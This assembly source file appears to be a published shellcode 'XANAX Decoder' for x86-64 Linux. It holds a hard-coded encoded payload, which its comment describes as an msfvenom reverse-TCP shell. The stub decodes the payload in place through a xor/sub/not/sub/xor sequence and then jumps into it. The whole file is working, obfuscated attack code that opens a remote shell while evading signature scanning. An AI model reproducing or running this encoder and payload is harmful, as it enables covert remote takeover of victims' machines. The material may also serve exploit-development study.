; Date: 08/04/2019
; XANAX Decoder
; Author: Alan Vivona
; Description: Reverts the xor-add-not-add-xor sequence using the same 4 byte key and executes the encoded payload.
; Tested on: x86-x64 GNU/Linux

global _start

section .text

keys.xor1 equ 0x29
keys.add1 equ 0xff
keys.xor2 equ 0x50
keys.add2 equ 0x05

; xanax encoded payload
payload.len equ 74 ; this can't be over 127 bytes otherwise it will procude nullbytes

_start:

    jmp encode_setup
    ; msfvenom -a x64 --platform linux -p linux/x64/shell_reverse_tcp -f hex
    ; Encoded using XANAX Encoder:
    payload_start: db  0x92, 0x55, 0xc4, 0x05, 0x92, 0x8a, 0xdf, 0x92, 0x8d, 0xde, 0x8f, 0x89, 0xf4, 0x17, 0xf4, 0x25, 0x8a, 0x8c, 0x9d, 0xc0, 0xff, 0x8c, 0x8c, 0x8d, 0xdd, 0xf4, 0x35, 0x66, 0x92, 0x9c, 0xc2, 0x92, 0x52, 0xc4, 0x8f, 0x89, 0x92, 0x8b, 0xde, 0xf4, 0x7f, 0x4e, 0x92, 0xad, 0xc4, 0x8f, 0x89, 0xf9, 0x76, 0x92, 0xa3, 0xc4, 0x05, 0xf4, 0x23, 0xaf, 0xea, 0x95, 0xee, 0xaf, 0xfb, 0x94, 0x8c, 0xdb, 0xf4, 0x35, 0x67, 0xda, 0xd7, 0xf4, 0x35, 0x66, 0x8f, 0x89

    encode_setup:
    xor rcx, rcx
    lea rsi, [rel payload_start]
    encode:
        mov al, byte [rsi+rcx]
        ; XANAX encoding (xor add neg add xor)
        xor al, keys.xor2
        sub al, keys.add2
        not al
        sub al, keys.add1
        xor al, keys.xor1

        mov byte [rsi+rcx], al

        inc rcx
        cmp rcx, payload.len
        jne encode

    ; Execute payload
    jmp rsi